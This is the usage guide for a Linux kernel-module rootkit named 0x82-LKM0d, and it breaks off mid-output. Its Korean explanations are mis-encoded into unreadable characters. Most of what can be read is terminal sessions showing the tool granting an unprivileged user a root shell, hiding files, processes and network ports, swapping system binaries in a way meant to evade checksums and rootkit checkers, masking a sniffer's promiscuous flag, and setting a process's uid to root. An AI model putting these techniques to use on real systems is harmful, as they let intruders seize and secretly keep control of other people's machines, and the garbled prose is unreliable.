0x82-LKM0d v0.3 by x82 0x82-LKM0dÀº Ä¿³Î 2.x ±â¹Ý rootkit ÀÔ´Ï´Ù. °³¹ß ¸ñÀûÀº ´Ü¼øÈ÷ Á¦°¡ Æí¸®ÇÏ°Ô »ç¿ëÇϱâ À§Çؼ­ ÀÔ´Ï´Ù. 0.3 ¹öÀüÀº ¹èÆ÷ÇÒ »ý°¢À¸·Î °³¹ßÇÏÁö ¾Ê¾Ò½À´Ï´Ù. (Á¤È®È÷ ¸»ÇÏÀÚ¸é, v0.3.0 ¹öÀüÀÔ´Ï´Ù.) ±×·¸±â ¶§¹®¿¡ src°¡ ÁöÀúºÐ ÇÒ ¼ö ÀÖ°í, ´Ù¸¥ ¼­¹ö¿¡¼­´Â ½Ç¿ë¼º(?)ÀÌ ¾ø´Â ±¸Çö ºÎºÐµµ ÀÖÀ» °ÍÀÔ´Ï´Ù. Ä¿³Î ±â¹Ý rootkitÀÇ ´ÜÁ¡Àº »ç¿ëÀÚ ±â¹ÝÀÇ ÇÁ·Î±×·¥Ã³·³ µ¿Àû(?)ÀÌÁö ¸øÇÏ´Ù´Â °ÍÀÔ´Ï´Ù. ´ëºÎºÐ Á¤ÀûÀ̸ç, »ç¿ëÀÚÀÇ ÀÔ·ÂÀ» ¿ä±¸ÇÏ´Â ºÎºÐÀº ±ØÈ÷ Àû½À´Ï´Ù. ÀÌÀ¯´Â ¿©·¯°¡Áö°¡ ÀÖ°ÚÁö¸¸, »ç¿ëÀÚÀÇ ÀÔ·Â Á¤º¸¸¦ ÀÇÁ¸ÇÒ °æ¿ì, À߸øµÈ 󸮿¡ ÀÇÇØ Ä¿³ÎÀÌ Á×À» °¡´É¼ºÀÌ ³ô±â ¶§¹®ÀÌ¶ó º¼ ¼öµµ ÀÖ°Ú½À´Ï´Ù. Ä¿³ÎÀÌ Á×À¸¸é, ½Ã½ºÅÛÀ» º¹±¸ÇÒ ¼ö ¾ø°Ô µË´Ï´Ù. (ÇØ°áÃ¥Àº rebootÀ» ÇÏ´Â °ÍÀÔ´Ï´Ù.) 0x82-LKM0d rootkitÀÇ °æ¿ì¿¡´Â Ä¿³Î¿¡¼­ ÀÌ·ç¾îÁö´Â ´ëºÎºÐÀÇ ÇàÀ§¸¦ »ç¿ëÀÚÀÇ ÀԷ¿¡ ÀÇÁ¸ÇÏ¿© °áÁ¤ÇÕ´Ï´Ù. ±×·¯¹Ç·Î, *¸Å¿ì* µ¿ÀûÀ̶ó ÇÒ ¼ö ÀÖ½À´Ï´Ù. ±¸ÇöÇÑ ¹æ½ÄÀº ¸Å¿ì ´Ü¼øÇÕ´Ï´Ù¸¸, Àá½Ã ¼³¸íÇϵµ·Ï ÇÏ°Ú½À´Ï´Ù. ¸ÕÀú, »ç¿ëÀÚ ÇÁ·Î±×·¥ÀÌ Á¸ÀçÇϴµ¥, ÀÌ ÇÁ·Î±×·¥Àº Ä¿³Î¿¡ ¼³Ä¡µÈ ÇÁ·Î±×·¥°ú Åë½ÅÇÒ ¼ö ÀÖµµ·Ï ¼³°èµÇ¾ú½À´Ï´Ù. »ç¿ëÀÚ¿¡°Ô ƯÁ¤ Ä¿¸Çµå¸¦ ÀԷ¹ÞÀ¸¸é, ±× ÀÔ·ÂÀ» ¿ªÇÒ¿¡ ¸Â°Ô ó¸®Çϱâ À§ÇØ Æ¯Á¤ ½Ã½ºÅÛÄÝ¿¡ Ä¿¸Çµå ³»¿ëÀ» ÀÔ·ÂÇÏ°í Ä¿³ÎÀº µé¾î¿Â ÀÔ·ÂÀ» ¹Þ¾Æ ¸ñÀû¿¡ ¸Â°Ô ó¸®ÇÏ°Ô µË´Ï´Ù. +--------------------------------------------+ | »ç¿ëÀÚ ÇÁ·Î±×·¥ | Application level +--------------------------------------------+ +---|-|-|-----------|-|-|------------|-|-|---+ | V V V V V V V V V | | System Call | +----------|-|---------------|-|-------------+ Kernel level +----------|-|---------------|-|-------------+ | V V V V | | (FS), (MM), (Dev), (Task), (Net) | +--------------------|-|---------------------+ V V ... ... (Driver), (Mem), (CPU) ... ... Hardware level ÀÌ·¯ÇÑ ±¸Á¶ ±¸ÇöÀÌ °¡´ÉÇÑ °ÍÀº ¸¶ÀÌÅ©·Î Ä¿³ÎÀÇ ÀåÁ¡À» Á¦°øÇÏ´Â ¸®´ª½º Ä¿³Î ´öºÐÀÔ´Ï´Ù. ¹°·Ð ¸®´ª½º Ä¿³ÎÀº ¸ð³ë¸®µñ Ä¿³ÎÀÔ´Ï´Ù, ±×·¯¹Ç·Î ±¸ÇöµÈ Äڵ尡 ÀûÀçµÇ´Â °ø°£Àº »ç¿ëÀÚ °ø°£ÀÌ ¾Æ´Ñ, Ä¿³Î °ø°£ÀÔ´Ï´Ù. ¾î·µç, ÇöÀç±îÁö °³¹ßµÈ ±â´ÉÀ» Çϳª¾¿ ¼³¸íÇغ¸°Ú½À´Ï´Ù. °³¹ßµÇ´Â ºÎºÐÀº °è¼Ó Ãß°¡Çϵµ·Ï ÇÏ°Ú½À´Ï´Ù. {0}: get root mode. ÀϹÝÀûÀ¸·Î Ä¿³Î ±â¹Ý rootkitµéÀÌ °¡Áö°í ÀÖ´Â ±â´ÉÀÔ´Ï´Ù. ¿¹Àü getuid() ÇÔ¼ö¸¦ ÈÄÅ·ÇÏ¿© ¾ò´Â root ±ÇÇÑ°ú´Â ¾à°£ ´Ù¸£´Ù°í ÇÒ ¼ö ÀÖ½À´Ï´Ù. ÀÏȸ »ç¿ë ½Ã, root ±ÇÇÑÀ» Çà»çÇÒ ¼ö ÀÖÀ¸¸ç, shellÀ» ¼öÇàÇÏ°í ½ÍÀº °æ¿ì¿¡´Â ´ÙÀ½°ú °°ÀÌ ½ÇÇàÇÏ¸é µË´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [½ÇÇàÇÒ ¸í·É °æ·Î] -- [x82@test LKM]$ id uid=500(x82) gid=500(x82) groups=500(x82) [x82@test LKM]$ ./mod 0 /bin/sh ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, get root mode. executing, /bin/sh program. Ok, Have a nice day! sh-2.04# id uid=0(root) gid=0(root) groups=500(x82) sh-2.04# exit exit [x82@test LKM]$ ./mod 0 /usr/bin/id ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, get root mode. executing, /usr/bin/id program. Ok, Have a nice day! uid=0(root) gid=0(root) groups=500(x82) [x82@test LKM]$ -- {1}: hidden file & dir mode. ÀÌ ±â´É ¿ª½Ã, ¸¹Àº Ä¿³Î ±â¹Ý ¹éµµ¾îµéÀÌ Ã¤ÅÃÇÏ°í ÀÖ´Â ±âº»ÀûÀÎ ±â´ÉÀÔ´Ï´Ù. linked list¸¦ ÅëÇØ »ç¿ëÀÚ°¡ ÀÔ·ÂÇÏ´Â ÇÁ·Î±×·¥À» ¹Þ¾Æ ÀúÀåÇÏ´Â ±¸Á¶¸¦ °¡Áö°í ÀÖ½À´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [¼û±æ ÆÄÀÏ ¹× µð·ºÅ丮 À̸§] -- [root@test LKM]# ls mod* mod mod.c mod_kern.back mod_kern.c mod_kern.h mod_kern.o [root@test LKM]# ./mod 1 mod ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, hidden file & dir mode. hidding, mod file & dir. Ok, Have a nice day! [root@test LKM]# ls mod* mod.c mod_kern.back mod_kern.c mod_kern.h mod_kern.o [root@test LKM]# -- mod ¶ó´Â ÇÁ·Î±×·¥À» ¼û°ÜºÃ½À´Ï´Ù. ¹¹, ±×·°Àú·° Àß ¼û°ÜÁö´Â ±º¿ä. :-) {2}: unhidden file & dir mode. ÀÌ ±â´ÉÀº 1¹ø ±â´ÉÀ» ÅëÇØ ¼û±ä ÆÄÀÏ ¹× µð·ºÅ丮µéÀ» Á¤»óÀûÀ¸·Î º¼ ¼ö ÀÖµµ·Ï º¹±¸ÇØÁÖ´Â ±â´ÉÀÔ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [º¹±¸ÇÒ ÆÄÀÏ ¹× µð·ºÅ丮 À̸§] -- [root@test LKM]# ls mod* mod.c mod_kern.back mod_kern.c mod_kern.h mod_kern.o [root@test LKM]# ./mod 2 mod ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, unhidden file & dir mode. unhidding, mod file & dir. Ok, Have a nice day! [root@test LKM]# ls mod* mod mod.c mod_kern.back mod_kern.c mod_kern.h mod_kern.o [root@test LKM]# -- ¼û°ÜÁ³´ø ÇÁ·Î±×·¥À» ÇØÁ¦ÇϹǷνá, ¿¹Àü°ú °°ÀÌ º¼ ¼ö ÀÖ°Ô µÇ¾ú½À´Ï´Ù. {3}: all unhidden file & dir mode. 1¹ø ±â´ÉÀ» ÅëÇØ ¼±¾ðµÇ¾î ¼û°ÜÁø ÆÄÀÏ ¹× µð·ºÅ丮µéÀ» ¸ðµÎ Á¤»óÀûÀ¸·Î º¼ ¼ö ÀÖµµ·Ï º¹±¸ÇÏ´Â ±â´ÉÀÔ´Ï´Ù. »ç¿ë¹ýÀº ¸Å¿ì °£´ÜÇÕ´Ï´Ù. ./mod [¼±Åà ¹øÈ£] -- [root@test LKM]# ./mod 3 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, all unhidden file & dir mode. all unhidding file & dir. Ok, Have a nice day! [root@test LKM]# -- À̷νá, ½Ã½ºÅÛ¿¡¼­ ¼û°å´ø ¸ðµç ÆÄÀÏ ¹× µð·ºÅ丮¸¦ º¼ ¼ö ÀÖ°Ô µË´Ï´Ù. {4}: hidden process mode. ÀÌ ±â´ÉÀº ½ÇÇà ÁßÀÎ ÇÁ·Î¼¼½º¸¦ ¼û±â´Â ¿ªÇÒÀ» ÇÕ´Ï´Ù. ÇÁ·Î¼¼½º »ó¿¡¼­ À̸§À» ÀÔ·ÂÇØÁÖ¸é, ´ÙÀ½°ú °°ÀÌ »ç¶óÁö´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [¼û±æ ÇÁ·Î¼¼½º À̸§] -- [root@test LKM]# ps PID TTY TIME CMD 1128 pts/1 00:00:00 login 1155 pts/1 00:00:00 su 1156 pts/1 00:00:01 bash 2323 pts/1 00:00:00 ps [root@test LKM]# ./mod 4 su ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, hidden process mode. hidding, su process. Ok, Have a nice day! [root@test LKM]# ps PID TTY TIME CMD 1128 pts/1 00:00:00 login 1156 pts/1 00:00:01 bash 2325 pts/1 00:00:00 ps [root@test LKM]# -- ½ÇÇà ÁßÀÎ su ÇÁ·Î¼¼½º¸¦ ¼û°Üº» °á°ú, ps ¸í·ÉÀ¸·Î È®ÀÎÇÒ ¼ö ¾ø°Ô µÇ¾ú½À´Ï´Ù. {5}: unhidden process mode. 4¹ø ±â´ÉÀ» ÅëÇØ ¼û±ä ÇÁ·Î¼¼½º¸¦ º¼ ¼ö ÀÖµµ·Ï º¹±¸ÇÏ´Â ±â´ÉÀÔ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [º¹±¸ÇÒ ÇÁ·Î¼¼½º À̸§] -- [root@test LKM]# ps PID TTY TIME CMD 1128 pts/1 00:00:00 login 1156 pts/1 00:00:01 bash 2327 pts/1 00:00:00 ps [root@test LKM]# ./mod 5 su ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, unhidden process mode. unhidding, su process. Ok, Have a nice day! [root@test LKM]# ps PID TTY TIME CMD 1128 pts/1 00:00:00 login 1155 pts/1 00:00:00 su 1156 pts/1 00:00:01 bash 2329 pts/1 00:00:00 ps [root@test LKM]# -- ¼û°ÜÁ³´ø su ÇÁ·Î¼¼½º¸¦ º¹±¸ÇÏ¿©, ps ¸í·É »ó¿¡¼­ º¼ ¼ö ÀÖ°Ô µÇ¾ú½À´Ï´Ù. {6}: all unhidden process mode. 4¹ø ±â´ÉÀ» ÅëÇØ ¼û±ä ¸ðµç ÇÁ·Î¼¼½º¸¦ º¼ ¼ö ÀÖµµ·Ï º¹±¸ÇÏ´Â ±â´ÉÀÔ´Ï´Ù. ÀÌ ¸í·ÉÀ» ÅëÇØ ¼û°ÜÁ³´ø ¸ðµç ÇÁ·Î¼¼½º¸¦ linked list ¸ñ·Ï¿¡¼­ »èÁ¦ÇÕ´Ï´Ù. ./mod [¼±Åà ¹øÈ£] -- [root@test LKM]# ./mod 6 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, all unhidden process mode. all unhidding process. Ok, Have a nice day! [root@test LKM]# -- {7}: data print mode. ÇöÀç µð¹ö±ëÀ» À§ÇØ »ç¿ëÇÏ°í ÀÖ´Â ±â´ÉÀÔ´Ï´Ù. °¢ linked list ¸ñ·ÏÀ» È®ÀÎÇÏ´Â ¸í·ÉÀ¸·Î½á, system logfile ¶Ç´Â, dmesg ¸í·ÉÀ¸·Î °á°ú¸¦ È®ÀÎÇÒ ¼ö ÀÖ½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] -- [root@test LKM]# ./mod 7 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, data print mode. Ok, execute, dmesg command! [root@test LKM]# dmesg | tail -5 --- file list --- --- process list --- --- program link list --- --- inet link list --- --- ghost list --- [root@test LKM]# -- {8}: program (trojan) link mode. ¹ÙÀ̳ʸ®¸¦ ¼öÁ¤ÇÏ´Â trojanÀÇ °æ¿ì, md5 checksumÀ̳ª rootkit checking tool¿¡ ÀÇÇØ ¹ß°ßµÉ ¼ö ÀÖ½À´Ï´Ù. Á¶±Ý ´õ ±ú²ýÇÑ ÇÁ·Î±×·¥ ¹Ù²ãÄ¡±â¸¦ À§ÇØ °³¹ßµÈ ±â´ÉÀÔ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [¹Ù²ãÄ¥ ¸í·É °æ·Î] [¹Ù²ð ¸í·É °æ·Î] -- [root@test LKM]# ls Makefile mod mod_kern.back mod_kern.h p.c banrl.h mod.c mod_kern.c mod_kern.o r.c [root@test LKM]# ./mod 8 /bin/ls /bin/ps ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, program (trojan) link mode. link mode: /bin/ls--->/bin/ps. Ok, Have a nice day! [root@test LKM]# ls ps: error: Unknown gnu long option. usage: ps -[Unix98 options] ps [BSD-style options] ps --[GNU-style long options] ps --help for a command summary [root@test LKM]# -- º»·¡ ls ¸í·ÉÀ» ps ¸í·ÉÀ¸·Î º¯°æÇÏ¿´½À´Ï´Ù. À̷νá, kernel ´Ü°è¿¡¼­ ¸í·É¾î¸¦ ¹Ù²ãÄ¡±â ÇÒ ¼ö ÀÖÀ¸¸ç, md5 checksumÀ̳ª, rootkit checking tool¿¡ ¾ÈÀüÇÒ ¼ö ÀÖ½À´Ï´Ù. {9}: program (trojan) unlink mode. 8¹ø ±â´É¿¡ ÀÇÇØ º¯°æµÈ ÇÁ·Î±×·¥À» º¹±¸ÇÏ´Â ±â´ÉÀÔ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [¹Ù²ãÄ£ ¸í·É °æ·Î] -- [root@test LKM]# ls ps: error: Unknown gnu long option. usage: ps -[Unix98 options] ps [BSD-style options] ps --[GNU-style long options] ps --help for a command summary [root@test LKM]# ./mod 9 /bin/ls ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, program (trojan) unlink mode. unlink mode: /bin/ls. Ok, Have a nice day! [root@test LKM]# ls Makefile mod mod_kern.back mod_kern.h p.c banrl.h mod.c mod_kern.c mod_kern.o r.c [root@test LKM]# -- ¸í·ÉÀÌ º¹±¸µÈ °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. {10}: program (trojan) all unlink mode. 8¹ø ±â´É¿¡ ÀÇÇØ º¯°æµÈ ¸ðµç ÇÁ·Î±×·¥À» º¹±¸ÇÏ´Â ±â´ÉÀÔ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] -- [root@test LKM]# ./mod 10 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, program (trojan) all unlink mode. all unlink, program (trojan). Ok, Have a nice day! [root@test LKM]# -- {11}: sniff On/Off mode. ½º´ÏÆÛ°¡ ÀÛµ¿µÇ¾úÀ»¶§ Ç¥½ÃµÇ´Â ¹«ÀÛÀ§ ¸ðµå(promiscuous mode) mark¸¦ Á¦°ÅÇÏ´Â ±â´ÉÀÔ´Ï´Ù. ifconfig ¸í·É ¼öÇà ½Ã, PROMISC mark Ç¥½Ã¸¦ ÅëÇØ ½º´ÏÆÛÀÇ ¼öÇà ¿©ºÎ¸¦ ÆÇ´ÜÇÒ ¼ö Àִµ¥, ÀÌ mark¸¦ Á¦°ÅÇÕ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [¸ðµå ¹øÈ£] ¸ðµå ¹øÈ£ 0¹øÀº ¼±Åà ¹øÈ£ ¸ñ·ÏÀ» º¸¿©ÁÝ´Ï´Ù. ¸ðµå ¹øÈ£ 1¹øÀº ½º´ÏÆÛ ¼û±è ±â´ÉÀ» OnÀ¸·Î ÀüȯÇÕ´Ï´Ù. ¸ðµå ¹øÈ£ 2¹øÀº ½º´ÏÆÛ ¼û±è ±â´ÉÀ» Off ½Ãŵ´Ï´Ù. -- [root@test LKM]# ./mod 11 0 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, sniff On/Off mode. -- {0}: mode list. ex) ./mod 11 0 {1}: On mode. ex) ./mod 11 1 {2}: Off mode. ex) ./mod 11 2 -- [root@test LKM]# -- [root@test LKM]# ifconfig eth0 Link encap:Ethernet HWaddr 00:50:BF:65:55:5E inet addr:xxx.xxx.xxx.xxx Bcast:xxx.xxx.xxx.127 Mask:255.255.255.128 UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1 RX packets:224866 errors:0 dropped:0 overruns:0 frame:0 TX packets:42354 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 Interrupt:5 Base address:0xe400 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:3924 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 [root@test LKM]# -- PROMISC mark°¡ Ç¥½ÃµÈ °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. ´ÙÀ½ ±â´ÉÀ» ¼öÇà ÈÄ, mark°¡ Áö¿öÁø °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. -- [root@test LKM]# ./mod 11 1 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, sniff On/Off mode. [!] Select, On mode. Ok, Have a nice day! [root@test LKM]# ifconfig eth0 Link encap:Ethernet HWaddr 00:50:BF:65:55:5E inet addr:xxx.xxx.xxx.xxx Bcast:xxx.xxx.xxx.127 Mask:255.255.255.128 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:224963 errors:0 dropped:0 overruns:0 frame:0 TX packets:42383 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 Interrupt:5 Base address:0xe400 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:3924 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 [root@test LKM]# -- PROMISC mark°¡ Áö¿öÁø °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. ¸ðµå ¹øÈ£ 2¹øÀ» ¼±ÅÃÇÒ °æ¿ì, PROMISC mark°¡ »ý±â´Â °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. -- [root@test LKM]# ./mod 11 2 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, sniff On/Off mode. [!] Select, Off mode. Ok, Have a nice day! [root@test LKM]# ifconfig eth0 Link encap:Ethernet HWaddr 00:50:BF:65:55:5E inet addr:xxx.xxx.xxx.xxx Bcast:xxx.xxx.xxx.127 Mask:255.255.255.128 UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1 RX packets:225481 errors:0 dropped:0 overruns:0 frame:0 TX packets:42430 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 Interrupt:5 Base address:0xe400 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:3924 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 [root@test LKM]# -- ¼û±è ¸ðµå¸¦ OffÇÑ °á°ú, PROMISC mark¸¦ º¼ ¼ö ÀÖ½À´Ï´Ù. {12}: hidden inet port mode. ¼­¹ö »ó¿¡¼­ ¼­ºñ½º ÁßÀÎ port¸¦ ¼û±â´Â ±â´ÉÀÔ´Ï´Ù. ÇöÀç ¼­ºñ½º ÁßÀÎ port »Ó¸¸¾Æ´Ï¶ó, port·Î Á¢¼Ó ÁßÀΠŬ¶óÀ̾ðÆ®ÀÇ Á¤º¸µµ ¸ðµÎ ¼û±æ ¼ö ÀÖ½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [¼û±æ Æ÷Æ® ¹øÈ£] -- [root@test LKM]# netstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 138 xxx.xxx.xxx.xxx:23 yyy.yyy.yyy.yyy:2232 ESTABLISHED tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 Active UNIX domain sockets (servers and established) Proto RefCnt Flags Type State I-Node Path unix 0 [ ] STREAM CONNECTED 238 @0000001d unix 2 [ ] DGRAM 394 /dev/log unix 0 [ ] DGRAM 1397 unix 0 [ ] DGRAM 438 [root@test LKM]# -- 23¹øÀÌ ¿­·È°í, ÇöÀç Ŭ¶óÀ̾ðÆ® yyy.yyy.yyy.yyy°¡ Á¢¼Ó ÁßÀÎ °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. ¼û°Üº¸°Ú½À´Ï´Ù. -- [root@test LKM]# ./mod 12 23 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, hidden inet port mode. hidden inet port number: 23. Ok, Have a nice day! [root@test LKM]# netstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 Active UNIX domain sockets (servers and established) Proto RefCnt Flags Type State I-Node Path unix 0 [ ] STREAM CONNECTED 238 @0000001d unix 2 [ ] DGRAM 394 /dev/log unix 0 [ ] DGRAM 1397 unix 0 [ ] DGRAM 438 [root@test LKM]# -- ¼­ºñ½º ÁßÀÎ 23¹ø port¿¡ °üÇÑ Á¤º¸°¡ ¸ðµÎ ¼û°ÜÁø °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. {13}: unhidden inet port mode. 12¹ø ±â´ÉÀ» ÅëÇØ ¼û°å´ø port¸¦ º¹±¸ÇÕ´Ï´Ù. º¹±¸µÈ ¼­ºñ½º port´Â ´Ù½Ã È®ÀÎÇÒ ¼ö ÀÖ°Ô µË´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [º¹±¸ÇÒ Æ÷Æ® ¹øÈ£] -- [root@test LKM]# netstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 Active UNIX domain sockets (servers and established) Proto RefCnt Flags Type State I-Node Path unix 0 [ ] STREAM CONNECTED 238 @0000001d unix 2 [ ] DGRAM 394 /dev/log unix 0 [ ] DGRAM 1397 unix 0 [ ] DGRAM 438 [root@test LKM]# ./mod 13 23 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, unhidden inet port mode. unhidden inet port number: 23. Ok, Have a nice day! [root@test LKM]# netstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 138 xxx.xxx.xxx.xxx:23 yyy.yyy.yyy.yyy:2232 ESTABLISHED tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 Active UNIX domain sockets (servers and established) Proto RefCnt Flags Type State I-Node Path unix 0 [ ] STREAM CONNECTED 238 @0000001d unix 2 [ ] DGRAM 394 /dev/log unix 0 [ ] DGRAM 1397 unix 0 [ ] DGRAM 438 [root@test LKM]# -- ¼­ºñ½º ÁßÀÎ 23¹ø port¸¦ È®ÀÎÇÒ ¼ö ÀÖ¾ú½À´Ï´Ù. {14}: all unhidden inet port mode. 12¹ø ±â´ÉÀ» ÅëÇØ ¼û°å´ø ¸ðµç port¸¦ º¹±¸ÇÕ´Ï´Ù. »ç¿ë¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] -- [root@test LKM]# ./mod 14 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, all unhidden inet port mode. all, unhidden inet port. Ok, Have a nice day! [root@test LKM]# -- {15}: process *id show mode. ÇÁ·Î¼¼½ºÀÇ Á¤º¸¸¦ º¸¿©ÁÖ´Â ±â´ÉÀÔ´Ï´Ù. ÁöÁ¤ÇÑ ÇÁ·Î¼¼½º ¹øÈ£¸¦ ÅëÇØ, ÇÁ·Î¼¼½º À̸§, uid, euid, suid, fsuid, gid, egid, sgid, fsgidµîÀÇ Á¤º¸¸¦ ¾Ë ¼ö ÀÖ½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [ÇÁ·Î¼¼½º(pid) ¹øÈ£] -- [root@test LKM]# ps | grep 1156 1156 pts/1 00:00:01 bash [root@test LKM]# ./mod 15 1156 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, process *id show mode. process id(pid) number: 1156. process name: bash. process uid: 0. process euid: 0. process suid: 0. process fsuid: 0. process gid: 0. process egid: 0. process sgid: 0. process fsgid: 0. Ok, Have a nice day! [root@test LKM]# -- {16}: process uid alteration mode. ƯÁ¤ ÇÁ·Î¼¼½ºÀÇ uid¸¦ º¯°æÇÏ´Â ºñ±³Àû Àç¹ÌÀÖ´Â ±â´ÉÀÔ´Ï´Ù. ÁöÁ¤ÇÑ ÇÁ·Î¼¼½º ¹øÈ£¸¦ ÅëÇØ uid, euid, suid, fsuidµîÀ» º¯°æÇÒ ¼ö ÀÖ°Ô ¼³°èµÇ¾ú½À´Ï´Ù. Âü°í·Î, 15¹ø ±â´ÉÀ» ÅëÇØ ÇÁ·Î¼¼½ºÀÇ id Á¤º¸¸¦ È®ÀÎÇÒ ¼ö ÀÖ½À´Ï´Ù. ./mod [¼±Åà ¹øÈ£] [ÇÁ·Î¼¼½º(pid) ¹øÈ£] [º¯°æÇÒ uid ¹øÈ£] -- [root@test LKM]# ps -aux | grep cat x82 2427 0.0 0.2 1284 312 pts/0 S 00:53 0:00 ./cat_shadow [root@test LKM]# ./mod 15 2427 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, process *id show mode. process id(pid) number: 2427. process name: cat_shadow. process uid: 500. process euid: 500. process suid: 500. process fsuid: 500. process gid: 500. process egid: 500. process sgid: 500. process fsgid: 500. Ok, Have a nice day! [root@test LKM]# ./mod 16 2427 0 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, process uid alteration mode. process id(pid) number: 2427. user id(uid) number: 0. Ok, Have a nice day! [root@test LKM]# ps -aux | grep cat root 2427 0.0 0.2 1284 312 pts/0 S 00:53 0:00 ./cat_shadow [root@test LKM]# ./mod 15 2427 ======================================================================= Test LKM (Loadable Kernel Module) Backdooring Tester: dong-hun you ======================================================================= [!] Select, process *id show mode. process id(pid) number: 2427. process name: cat_shadow. process uid: 0. process euid: 0. process suid: 0. process fsuid: 0. process gid: 500. process egid: 